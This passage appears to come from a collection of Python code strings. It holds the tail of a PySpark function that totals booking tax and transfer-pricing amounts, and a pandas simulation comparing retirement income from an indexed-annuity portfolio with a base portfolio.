seq_reservas):\n # df_hotel = manager.get_dataframe(tables['dwc_bok_t_canco_hotel'])\n # df_circuit = manager.get_dataframe(tables['dwc_bok_t_canco_hotel_circuit'])\n # df_other = manager.get_dataframe(tables['dwc_bok_t_canco_other'])\n # df_transfer = manager.get_dataframe(tables['dwc_bok_t_canco_transfer'])\n # df_endow = manager.get_dataframe(tables['dwc_bok_t_canco_endowments'])\n # df_extra = manager.get_dataframe(tables['dwc_bok_t_canco_extra'])\n\n df_aux = df_fields.select(\"operative_incoming\", \"booking_id\")\n\n df_hotel = sub_tax_sales_transfer_pricing_aux(manager, df_hotelt, seq_recs, seq_reservas, df_aux)\n df_circuit = sub_tax_sales_transfer_pricing_aux(manager, df_circuitt, seq_recs, seq_reservas, df_aux)\n df_other = sub_tax_sales_transfer_pricing_aux(manager, df_othert, seq_recs, seq_reservas, df_aux)\n df_transfer = sub_tax_sales_transfer_pricing_aux(manager, df_transfert, seq_recs, seq_reservas, df_aux)\n df_endow = sub_tax_sales_transfer_pricing_aux(manager, df_endowt, seq_recs, seq_reservas, df_aux)\n df_extra = sub_tax_sales_transfer_pricing_aux_extra(manager, df_extrat, seq_recs, seq_reservas, df_aux)\n\n df_impuesto_canal = df_hotel.union(df_circuit).union(df_other).union(df_transfer).union(df_endow).union(\n df_extra)\n\n df_impuesto_canal = df_impuesto_canal.groupBy(\"seq_rec\", \"seq_reserva\") \\\n .agg({'impuesto_canal': 'sum'}).withColumnRenamed(\"SUM(impuesto_canal)\", \"Tax_Sales_Transfer_pricing\")\n\n df_fields = df_fields.join(df_impuesto_canal, [df_fields.operative_incoming == df_impuesto_canal.seq_rec,\n df_fields.booking_id == df_impuesto_canal.seq_reserva],\n 'left_outer').drop(df_impuesto_canal.seq_rec).drop(df_impuesto_canal.seq_reserva)\n\n df_fields = df_fields.na.fill({\"Tax_Sales_Transfer_pricing\": 0})\n\n df_fields = df_fields.withColumn(\"Tax_Sales_Transfer_pricing\",\n udf_round_ccy(df_fields.Tax_Sales_Transfer_pricing,\n df_fields.booking_currency))\n\n del df_hotel, df_circuit, df_other, df_transfer, df_endow, df_extra, df_impuesto_canal\n\n return df_fields", "def income_model_asset_based_portfolio_custom(num_of_years=30, trials=100, method='normal', income=True):\n\n sim_fia_cv = 
pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total = pd.DataFrame(index=range(num_of_years + 1))\n sim_base_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_port_total = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total_pre_income = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_total_pre_income = pd.DataFrame(index=range(num_of_years + 1))\n\n # read_income_inputs = pd.read_csv(src + \"income_model_inputs.csv\", index_col='Items')\n read_income_inputs = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='income_model_inputs',\n index_col=[0])\n\n # read_returns_est = pd.read_csv(src + \"income_assets_returns_estimates.csv\", index_col='Symbol')\n read_returns_est = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='income_assets_returns_estimates',\n index_col=[0])\n\n clean_names = list(read_returns_est.index)\n clean_names = [s.split(' ')[0] for s in clean_names]\n read_returns_est.loc[:, 'names'] = clean_names\n read_returns_est.set_index('names', drop=True, inplace=True)\n read_returns_est = read_returns_est[:-1]\n read_returns_est.rename(index={'SBMMTB3': 'Cash', read_returns_est.index[-1]: 'FIA'}, inplace=True)\n\n # ---------------Returns DataFrame based on the use input------------------------------------\n ann_ret = np.full((num_of_years + 1, len(read_returns_est)), read_returns_est.loc[:, 'Annualized Returns'])\n read_normal = pd.DataFrame(ann_ret, index=np.arange(num_of_years + 1), columns=read_returns_est.index)\n # read_normal.rename(columns={read_normal.columns[-1]: 'FIA'}, inplace=True)\n user_est_fia_return = float(read_income_inputs.loc['fia_forecast', 'inputs'])\n read_normal.loc[:, 'FIA'] = user_est_fia_return\n\n read_returns_est.loc['FIA', 'Annualized Returns'] = user_est_fia_return\n\n # read_returns_est.drop(['BM', read_returns_est.index[-1]], axis=0, inplace=True)\n # read_portfolio_inputs = pd.read_csv(src + \"income_portfolio_inputs.csv\", index_col='Items')\n\n # read_asset_weights = pd.read_csv(src + \"asset_weights.csv\", index_col='Asset')\n read_asset_weights = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='asset_weights',\n index_col=[0])\n\n read_asset_weights.drop(read_asset_weights.index[-1], axis=0, inplace=True)\n\n # read random returns for simulation\n # read_normal = pd.read_csv(src + 'sort_normal.csv', index_col=[0], parse_dates=True)\n # read_small = pd.read_csv(src + 'sort_small_to_large.csv', index_col=[0], parse_dates=True)\n # read_large = pd.read_csv(src + 'sort_large_to_small.csv', index_col=[0], parse_dates=True)\n assets_col_names = list(read_normal.columns)\n\n tickers = list(read_asset_weights.index)\n wts = np.array(read_asset_weights.loc[:, 'base'])\n\n def asset_median_returns(data, ticker):\n return data.filter(regex=ticker).median(axis=1)\n\n # dataframe for unsorted returns (normal)\n median_returns_normal = pd.DataFrame({t: asset_median_returns(read_normal, t) for t in tickers})\n median_returns_normal.loc[:, 'portfolio_return'] = median_returns_normal.dot(wts)\n median_normal_fia = pd.DataFrame({'FIA': asset_median_returns(read_normal, 'FIA')})\n #\n # # dataframe for smallest to largest returns\n # median_returns_smallest = pd.DataFrame({t: asset_median_returns(read_small, t) for t in tickers})\n # median_returns_smallest.loc[:, 'portfolio_return'] = median_returns_smallest.dot(wts)\n # median_smallest_fia = pd.DataFrame({'FIA': asset_median_returns(read_small, 'r_FIA')})\n #\n # 
# dataframe for unsorted returns (normal)\n # median_returns_largest = pd.DataFrame({t: asset_median_returns(read_large, t) for t in tickers})\n # median_returns_largest.loc[:, 'portfolio_return'] = median_returns_largest.dot(wts)\n # median_largest_fia = pd.DataFrame({'FIA': asset_median_returns(read_large, 'r_FIA')})\n\n years = list(range(0, num_of_years + 1))\n income_cols = ['year', 'strategy_term', 'index_returns', 'term_ret', 'term_ret_with_par', 'term_annualize',\n 'ann_net_spread', 'term_ret_netspr', 'high_inc_benefit_base', 'rider_fee', 'eoy_income',\n 'contract_value']\n\n term = int(read_income_inputs.loc['term', 'inputs'])\n fia_ret = read_returns_est.loc[read_returns_est.index[-1], 'Annualized Returns']\n fia_risk = read_returns_est.loc[read_returns_est.index[-1], 'Annualized Risk']\n par_rate = float(read_income_inputs.loc['par_rate', 'inputs'])\n spread = float(read_income_inputs.loc['spread', 'inputs'])\n bonus_term = int(read_income_inputs.loc['bonus_term', 'inputs'])\n premium = float(read_income_inputs.loc['premium', 'inputs'])\n income_bonus = float(read_income_inputs.loc['income_bonus', 'inputs'])\n\n income_starts = int(read_income_inputs.loc['start_income_years', 'inputs'])\n income_growth = float(read_income_inputs.loc['income_growth', 'inputs'])\n rider_fee = float(read_income_inputs.loc['rider_fee', 'inputs'])\n inc_payout_factor = float(read_income_inputs.loc['income_payout_factor', 'inputs'])\n contract_bonus = float(read_income_inputs.loc['contract_bonus', 'inputs'])\n social = float(read_income_inputs.loc['social', 'inputs'])\n inflation = float(read_income_inputs.loc['inflation', 'inputs'])\n wtd_cpn_yield = float(read_income_inputs.loc['wtd_coupon_yld', 'inputs'])\n life_expectancy = int(read_income_inputs.loc['life_expectancy_age', 'inputs'])\n clients_age = int(read_income_inputs.loc['clients_age', 'inputs'])\n\n # ---------------INCOME MODEL--------------------------------------------\n runs = 0\n returns_dict = {}\n asset_dict = {}\n fia_dict = {}\n while runs < trials:\n print(runs)\n\n income_df = pd.DataFrame(index=years, columns=income_cols)\n income_df.loc[:, 'year'] = years\n income_df.loc[:, 'strategy_term'] = income_df.loc[:, 'year'] % term\n income_df.loc[:, 'strategy_term'] = income_df['strategy_term'].apply(lambda x: 1 if x == 0 else 0)\n\n income_df.loc[:, 'index_returns'] = read_normal.loc[:, 'FIA']\n # income_df.loc[:, 'index_returns'] = np.random.normal(fia_ret, fia_risk, size=(len(years), 1))\n\n cumprod = (1. 
+ income_df['index_returns']).rolling(window=term).agg(lambda x: x.prod()) - 1\n income_df.loc[:, 'term_ret'] = np.where(income_df.loc[:, 'strategy_term'] == 1, cumprod, 0)\n income_df.loc[:, 'term_ret_with_par'] = income_df.loc[:, 'term_ret'] * par_rate\n income_df.loc[:, 'term_annualize'] = income_df.loc[:, 'term_ret_with_par'].apply(\n lambda x: (1 + x) ** (1 / term) - 1)\n income_df.loc[:, 'ann_net_spread'] = income_df.loc[:, 'term_annualize'] - spread\n income_df.loc[:, 'ann_net_spread'] = np.where(income_df.loc[:, 'strategy_term'] == 1,\n income_df.loc[:, 'ann_net_spread'], 0)\n income_df.loc[:, 'term_ret_netspr'] = income_df.loc[:, 'ann_net_spread'].apply(lambda x: (1 + x) ** term - 1)\n\n for counter in years:\n if counter == 0:\n income_df.loc[counter, 'high_inc_benefit_base'] = premium * (1 + income_bonus)\n\n elif counter <= min(bonus_term, income_starts):\n income_df.loc[counter, 'high_inc_benefit_base'] = income_df.loc[counter - 1, 'high_inc_benefit_base'] * \\\n (1 + income_growth)\n else:\n income_df.loc[counter, 'high_inc_benefit_base'] = income_df.loc[counter - 1, 'high_inc_benefit_base']\n\n income_df.loc[:, 'rider_fee'] = income_df.loc[:, 'high_inc_benefit_base'] * rider_fee\n income_df.loc[:, 'eoy_income'] = np.where(income_df.loc[:, 'year'] > income_starts,\n income_df.loc[:, 'high_inc_benefit_base'] * inc_payout_factor, 0)\n\n for counter in years:\n if counter == 0:\n income_df.loc[counter, 'contract_value'] = premium * (1 + contract_bonus)\n\n elif income_df.loc[counter, 'strategy_term'] == 1:\n x1 = income_df.loc[counter - 1, 'contract_value'] - income_df.loc[counter, 'rider_fee']\n x2 = (x1 * (1 + income_df.loc[counter, 'term_ret_netspr'])) - income_df.loc[counter, 'eoy_income']\n income_df.loc[counter, 'contract_value'] = x2\n\n else:\n x1 = income_df.loc[counter - 1, 'contract_value'] - income_df.loc[counter, 'rider_fee'] - \\\n income_df.loc[counter, 'eoy_income']\n\n income_df.loc[counter, 'contract_value'] = x1\n\n # variable stores the income number that is used in the base and fia portfolio calcs.\n\n income_from_fia = income_df.loc[income_df.index[-1], 'eoy_income']\n\n income_df.loc[:, 'contract_value'] = income_df.loc[:, 'contract_value'].apply(lambda x: 0 if x <= 0 else x)\n\n sim_fia_cv.loc[:, str(runs)] = income_df.loc[:, 'contract_value']\n\n # -------------------------------------BASE MODEL---------------------------------------------\n\n base_wts = read_asset_weights.loc[:, 'base']\n base_assets = list(base_wts.index)\n base_weights = list(base_wts.values)\n base_returns = list(read_returns_est.loc[:, 'Annualized Returns'].values)\n base_std = list(read_returns_est.loc[:, 'Annualized Risk'].values)\n\n base_investment = float(read_income_inputs.loc['risky_assets', 'Base'])\n adv_fees = float(read_income_inputs.loc['advisor_fees', 'Base'])\n\n # -------------------required income----------------------------------\n if income:\n req_annual_income = float(read_income_inputs.loc['annual_income', 'inputs'])\n income_needed = req_annual_income - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n cpn_income_base = base_investment * wtd_cpn_yield\n else:\n req_annual_income = 0.0\n income_needed = 0.0\n income_net_fia_income = 0.0\n cpn_income_base = base_investment * wtd_cpn_yield\n\n # ----------------------RANDOM RETURNS--------------------------\n r_cols = ['r_{}'.format(name) for name in base_assets]\n boy_value = ['bv_{}'.format(name) for name in base_assets]\n eoy_value = ['ev_{}'.format(name) for name in base_assets]\n\n 
random_returns = pd.DataFrame(index=income_df.index, columns=r_cols)\n\n # for c in range(len(r_cols)):\n # ret = np.random.normal(base_returns[c], base_std[c], size=(len(random_returns.index), 1))\n\n # this_run_cols = ['{}_{}'.format(cname, str(runs)) for cname in r_cols]\n random_returns = read_normal.loc[:, base_assets]\n\n # random_returns.loc[:, r_cols[c]] = ret.flatten()\n # asset_dict.update({'{}_{}'.format(r_cols[c], str(runs)): ret.flatten()})\n\n # store the simulated assets returns in one dictionary\n # returns_dict.update({str(runs): random_returns})\n\n # collect the asset based returns from all simulation and calculate the median returns.\n # def get_median_returns(sym):\n # cols = [sym + '_' + str(c) for c in np.arange(trials)]\n # asset_df = pd.DataFrame({c: asset_dict.get(c) for c in cols})\n # return asset_df.median(axis=1)\n #\n # asset_median_returns = pd.DataFrame({symbol: get_median_returns(symbol) for symbol in r_cols})\n #\n # asset_median_returns.loc[:, 'simulated_portfolio_median_returns'] = asset_median_returns.dot(base_weights)\n\n base_df = random_returns.copy()\n\n # base_investment = float(read_portfolio_inputs.loc['risky_assets', 'Base'])\n\n fia_portfolio_df = random_returns.copy()\n port_investment = float(read_income_inputs.loc['risky_assets', 'FIA'])\n cpn_income_port = port_investment * wtd_cpn_yield\n\n # ----------------------------------------BASE PORTFOLIO----------------------------\n for name in boy_value:\n base_df.loc[:, name] = 0.0\n\n for counter in years:\n period_returns = list(random_returns.loc[counter, :])\n if counter == 0:\n\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment for c in range(len(boy_value))]\n\n base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'total_net_fees'] = 0.0\n base_df.loc[counter, 'income'] = 0.0\n base_investment = base_df.loc[counter, boy_value].sum()\n\n elif (counter > 0) and (counter < income_starts):\n\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'adv_fees'] = base_df.loc[counter, 'total'] * adv_fees\n base_df.loc[counter, 'total_net_fees'] = base_df.loc[counter, 'total'] - base_df.loc[\n counter, 'adv_fees']\n\n # --coupon payment is invested back into the risky portfolio until the income is withdrawn----\n base_investment = base_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n else:\n\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'adv_fees'] = base_df.loc[counter, 'total'] * adv_fees\n\n # ---req. income is adjusted for inflation from the second year of withdrawal. Reinvestment of coupon\n # stops from the year income starts. Req. 
income is reduced by the coupon payments\n\n if counter == income_starts:\n\n income_needed = req_annual_income - social\n base_df.loc[counter, 'income'] = income_needed - cpn_income_base\n income_needed = req_annual_income\n\n else:\n income_needed = income_needed * (1 + inflation) - social\n base_df.loc[counter, 'income'] = income_needed - cpn_income_base\n income_needed = income_needed + social\n\n base_df.loc[counter, 'total_net_fees'] = base_df.loc[counter, 'total'] - \\\n base_df.loc[counter, 'adv_fees'] - \\\n base_df.loc[counter, 'income']\n\n base_df.loc[counter, 'total_pre_income'] = base_df.loc[counter, 'total'] - \\\n base_df.loc[counter, 'adv_fees']\n\n base_investment = base_df.loc[counter, 'total_net_fees']\n\n base_df.loc[:, 'adj_total'] = base_df.loc[:, 'total_net_fees'].apply(lambda x: x if x > 0 else 0)\n sim_base_total.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'total_net_fees']\n sim_base_income.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'income']\n sim_base_total_pre_income.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'total_pre_income']\n\n # ----------------------------FIA PORTFOLIO----------------------------------------------\n for name in boy_value:\n fia_portfolio_df.loc[:, name] = 0.0\n\n for counter in years:\n period_returns = list(random_returns.loc[counter, :])\n if counter == 0:\n\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment\n for c in range(len(boy_value))]\n fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'total_net_fees'] = 0.0\n fia_portfolio_df.loc[counter, 'income'] = 0.0\n port_investment = fia_portfolio_df.loc[counter, boy_value].sum()\n\n elif (counter > 0) and (counter < income_starts):\n\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'adv_fees'] = fia_portfolio_df.loc[counter, 'total'] * adv_fees\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees']\n\n port_investment = fia_portfolio_df.loc[counter, 'total_net_fees'] + cpn_income_port\n\n else:\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'adv_fees'] = fia_portfolio_df.loc[counter, 'total'] * adv_fees\n\n # ---req. income is adjusted for inflation from the second year of withdrawal. Reinvestment of coupon\n # stops from the year income starts. Req. 
income is reduced by the coupon payments\n\n if counter == income_starts:\n\n income_needed = req_annual_income - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n fia_portfolio_df.loc[counter, 'income'] = max(0, income_net_fia_income - cpn_income_port)\n income_needed = req_annual_income\n\n else:\n income_needed = income_needed * (1 + inflation) - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n fia_portfolio_df.loc[counter, 'income'] = max(0, income_net_fia_income - cpn_income_port)\n income_needed = income_needed + social\n\n if income:\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees'] - \\\n fia_portfolio_df.loc[counter, 'income']\n else:\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees'] + \\\n income_from_fia\n\n fia_portfolio_df.loc[counter, 'total_pre_income'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees']\n\n port_investment = fia_portfolio_df.loc[counter, 'total_net_fees']\n\n sim_port_total.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'total_net_fees'] + \\\n income_df.loc[:, 'contract_value']\n\n sim_port_income.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'income']\n\n fia_portfolio_df.loc[:, 'adj_total'] = fia_portfolio_df.loc[:, 'total_net_fees'].apply(\n lambda x: x if x > 0 else 0)\n\n sim_port_total_pre_income.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'total_pre_income']\n\n runs += 1\n\n # ------------------Calculate % of portfolios ending value greater than required LIFETIME cumm. income---------\n total_income_by_age = sim_base_income.loc[:, sim_base_income.columns[0]].cumsum()\n total_income_by_acturial_age = total_income_by_age.loc[life_expectancy - clients_age]\n total_income_by_age.fillna(0, inplace=True)\n income_dataframe = pd.DataFrame(total_income_by_age)\n income_dataframe.loc[:, 'remaining_income_by_acturial_age'] = total_income_by_age.apply(\n lambda x: total_income_by_acturial_age - x)\n\n s = income_dataframe.loc[:, 'remaining_income_by_acturial_age']\n base_prob_of_success = sim_base_total.gt(s, axis=0).sum(axis=1)\n port_prob_of_success = sim_port_total.gt(s, axis=0).sum(axis=1)\n\n # ----------------------------Portfolio sufficient for NEXT YEARS income needs-------------------\n next_year_income = sim_base_income.loc[:, sim_base_income.columns[0]].shift(-1).fillna(0) # Yearly Income Reqd.\n base_success_next_year = sim_base_total.gt(next_year_income, axis=0).sum(axis=1)\n\n base_for_next_year_need = sim_base_total[sim_base_total.gt(next_year_income, axis=0)]\n\n port_success_next_year = sim_port_total.gt(next_year_income, axis=0).sum(axis=1)\n\n port_for_next_year_need = sim_port_total[sim_port_total.gt(next_year_income, axis=0)]\n\n # ---------------Portfolio for 45 years of simulation---------------------------------------\n base_success_portfolio = sim_base_total[sim_base_total.gt(next_year_income, axis=0)]\n port_success_portfolio = sim_port_total[sim_port_total.gt(next_year_income, axis=0)]\n\n # ----------------Portfolio Simulation until the acturial age------------------------------\n acturial_years = life_expectancy - clients_age\n base_success_portfolio_act_age = base_success_portfolio.loc[acturial_years, :]\n port_success_portfolio_act_age = port_success_portfolio.loc[acturial_years, :]\n\n # -------------------------Base 
Portfolio TS with max Terminal Value ----------------------------\n if base_success_portfolio_act_age.isnull().sum() == trials:\n base_max_portfolio = 0.0\n else:\n base_max_portfolio = base_success_portfolio.loc[:, base_success_portfolio_act_age.idxmax()]\n\n # -------------------------FIA Portfolio TS with max Terminal Value ----------------------------\n if port_success_portfolio_act_age.isnull().sum() == trials:\n port_max_portfolio = 0.0\n else:\n port_max_portfolio = port_success_portfolio.loc[:, port_success_portfolio_act_age.idxmax()]\n # ------------------------------Average age with full income------------------------------\n base_mean_age = ((life_expectancy - clients_age) - base_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).mean()\n\n port_mean_age = ((life_expectancy - clients_age) - port_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).mean()\n\n # ----------------------------Median Age with full Income------------------------------------------\n base_median_age = ((life_expectancy - clients_age) - base_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).median()\n\n port_median_age = ((life_expectancy - clients_age) - port_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).median()\n\n # --------------Mean Value for all the portfolios at end of the acturial age--------------------\n base_act_avg_porfolio = base_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).mean()\n port_act_avg_porfolio = port_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).mean()\n\n # --------------Median Value for all the portfolios at end of the acturial age--------------------\n base_act_median_porfolio = base_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).median()\n port_act_median_porfolio = port_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).median()\n\n # # --------------Mean Value for all the portfolios in the simulation--------------------\n # base_sim_mean = base_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().mean()\n # port_sim_mean = port_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().mean()\n #\n # # --------------Median Value for all the portfolios in the simulation--------------------\n # base_sim_mean = base_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().median()\n # port_sim_mean = port_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().median()\n\n # -------Max Portfolio value at the end of acturial age----------------------------------------\n base_act_max = base_success_portfolio.loc[life_expectancy - clients_age, :].max()\n port_act_max = port_success_portfolio.loc[life_expectancy - clients_age, :].max()\n\n # -------Min Portfolio value at the end of acturial age----------------------------------------\n base_act_min = base_success_portfolio.loc[life_expectancy - clients_age, :].min()\n port_act_min = port_success_portfolio.loc[life_expectancy - clients_age, :].min()\n\n # ---------------------Lifetime Average Income----------------------------------\n base_total_income = sim_base_income.cumsum().loc[acturial_years, :].mean()\n port_total_income = income_from_fia + sim_port_income\n port_total_income = port_total_income.cumsum().loc[acturial_years, :].mean()\n\n simulation_stats = pd.DataFrame(index=['Average Years', 'Median Years', 'Average Age', 'Median Age',\n 'Average Portfolio (act.age)', 'Median Portfolio (act.age)',\n 'Max 
Portfolio Value', 'Min Portfolio Value',\n 'Average Lifetime Income'], columns=['Base', 'FIA'])\n\n simulation_stats.loc['Average Years', :] = [base_mean_age, base_mean_age]\n simulation_stats.loc['Median Years', :] = [base_median_age, base_median_age]\n simulation_stats.loc['Average Age', :] = [base_mean_age + clients_age, base_mean_age + clients_age]\n simulation_stats.loc['Median Age', :] = [base_median_age + clients_age, base_median_age + clients_age]\n simulation_stats.loc['Average Portfolio (act.age)', :] = [base_act_avg_porfolio, port_act_avg_porfolio]\n simulation_stats.loc['Median Portfolio (act.age)', :] = [base_act_median_porfolio, port_act_median_porfolio]\n simulation_stats.loc['Max Portfolio Value', :] = [base_act_max, port_act_max]\n simulation_stats.loc['Min Portfolio Value', :] = [base_act_min, port_act_min]\n simulation_stats.loc['Average Lifetime Income', :] = [base_total_income, port_total_income]\n comments = ['Average years of portfolios that meet the next years income needs for the lifetime',\n 'Median years of portfolios that meet the next years income needs for the lifetime',\n 'Average Clients Age',\n 'Median Clients Age',\n 'Average of terminal values for the portfolios at the end of the acturial life',\n 'Median of terminal values for the portfolios at the end of the acturial life',\n 'Maximum of terminal values for the portfolios at the end of the acturial life',\n 'Minimum of terminal values for the portfolios at the end of the acturial life',\n 'Average of total income generated by all portfolios at the end of the acturial life']\n\n simulation_stats.loc[:, 'Notes'] = comments\n\n # --------------------------------------------------------------------------------\n\n # # -----------------------------------income breakdown for Base portfolio----------------------------------\n # base_df.to_csv(src + 'base_port_detail.csv')\n # sim_base_total.to_csv(src + 'base_ending_values.csv')\n # income_breakdown_base = pd.DataFrame(sim_base_total.quantile(0.5, axis=1))\n # income_breakdown_base.loc[:, 'income_from_portfolio'] = sim_base_income.quantile(0.5, axis=1)\n # income_breakdown_base.loc[:, 'fia_income'] = 0.0\n # income_breakdown_base.loc[:, 'social_security_income'] = social\n # income_breakdown_base.loc[:, 'coupon_income'] = cpn_income_base\n #\n # income_breakdown_base.rename(columns={income_breakdown_base.columns[0]: 'portfolio_ending_value'}, inplace=True)\n # income_breakdown_base.loc[:, 'income_from_portfolio'][\n # income_breakdown_base.loc[:, 'portfolio_ending_value'] <= 0] = 0\n # income_breakdown_base.loc[:, 'total_income'] = income_breakdown_base.loc[:, income_breakdown_base.columns[1:]].sum(\n # axis=1)\n #\n # # --------------------------------------Block Ends-----------------------------------------------------------\n #\n # # ---------------------------------------income breakdown for FIA portfolio----------------------------------\n # fia_portfolio_df.to_csv(src + 'fia_port_detail.csv')\n # sim_port_total.to_csv(src + 'fiaport_ending_values.csv')\n #\n # income_breakdown_port = pd.DataFrame(sim_port_total.quantile(0.5, axis=1))\n # income_breakdown_port.loc[:, 'income_from_portfolio'] = sim_port_income.quantile(0.5, axis=1)\n # income_breakdown_port.loc[:, 'fia_income'] = income_from_fia\n # income_breakdown_port.loc[:, 'social_security_income'] = social\n # income_breakdown_port.loc[:, 'coupon_income'] = cpn_income_port\n #\n # income_breakdown_port.rename(columns={income_breakdown_port.columns[0]: 'portfolio_ending_value'}, inplace=True)\n # 
income_breakdown_port.loc[:, 'income_from_portfolio'][\n # income_breakdown_port.loc[:, 'portfolio_ending_value'] <= 0] = 0\n # income_breakdown_port.loc[:, 'total_income'] = income_breakdown_port.loc[:, income_breakdown_port.columns[1:]].sum(\n # axis=1)\n #\n # # ----------------------------------Block Ends-------------------------------------------------------------\n q_cut = [0.0, 0.05, 0.25, 0.5, 0.75, 0.95, 1.0]\n sim_base_income[sim_base_total < income_needed] = 0.0\n\n sim_port_income[sim_port_total < income_net_fia_income] = 0\n\n sim_port_income = sim_port_income + income_from_fia\n\n # base_quantile = sim_base_total.loc[sim_base_total.index[-1]].quantile([0.05, 0.25, 0.50, 0.75, 0.90])\n #\n # port_quantile = sim_port_total.loc[sim_port_total.index[-1]].quantile([0.05, 0.25, 0.50, 0.75, 0.90])\n\n base_quantile = sim_base_total.loc[sim_base_total.index[-1]].quantile(q_cut)\n\n port_quantile = sim_port_total.loc[sim_port_total.index[-1]].quantile(q_cut)\n\n # q_cut = [0.0, .05, 0.25, 0.5, 0.75, 0.95, 1.0]\n cols = ['Min', '5th', '25th', '50th', '75th', '90th', 'Max']\n\n # ------------------------------------------drop year 0-----------------------------------------\n sim_base_total = sim_base_total[1:]\n sim_port_total = sim_port_total[1:]\n\n # ------------------------quantile analysis for base terminal value-----------------------------\n base_qcut = pd.DataFrame(index=sim_base_total.index, columns=cols)\n for c in range(len(cols)):\n base_qcut.loc[:, cols[c]] = sim_base_total.quantile(q_cut[c], axis=1)\n\n base_qcut.clip(lower=0, inplace=True)\n\n sim_base_total.clip(lower=0, inplace=True)\n\n # -------------------------------------quantile analysis for base income----------------------------\n base_income_qcut = pd.DataFrame(index=sim_base_income.index, columns=cols)\n for c in range(len(cols)):\n base_income_qcut.loc[:, cols[c]] = sim_base_income.quantile(q_cut[c], axis=1)\n\n # ----Remove NaN's prior to the income start years------------\n # base_income_qcut = base_income_qcut.loc[income_starts:]\n\n # ---------------------------------quantile analysis for portfolio terminal value ---------------\n\n port_qcut = pd.DataFrame(index=sim_port_total.index, columns=cols)\n for c in range(len(cols)):\n port_qcut.loc[:, cols[c]] = sim_port_total.quantile(q_cut[c], axis=1)\n\n port_qcut.clip(lower=0, inplace=True)\n\n # ----------------------------------quantile analysis for portfolio income----------------------------\n port_income_qcut = pd.DataFrame(index=sim_port_income.index, columns=cols)\n for c in range(len(cols)):\n port_income_qcut.loc[:, cols[c]] = sim_port_income.quantile(q_cut[c], axis=1)\n\n # ----Remove NaN's prior to the income start years------------\n # port_income_qcut = port_income_qcut.loc[income_starts:]\n\n # ----------probability ending value will be less than 0 at the end of the horizon -----------------------\n # base_legacy_risk = (sim_base_total.loc[sim_base_total.index[-1]] < 0).sum() / (trials)\n\n base_legacy_risk = (sim_base_total.loc[sim_base_total.index[life_expectancy - clients_age]] < 0).sum() / trials\n port_legacy_risk = (sim_port_total.loc[sim_port_total.index[life_expectancy - clients_age]] < 0).sum() / trials\n\n # port_legacy_risk = (sim_port_total.loc[sim_port_total.index[-1]] <= 0).sum() / (trials)\n\n legacy_risk = pd.DataFrame([base_legacy_risk, port_legacy_risk,\n 'Prob. 
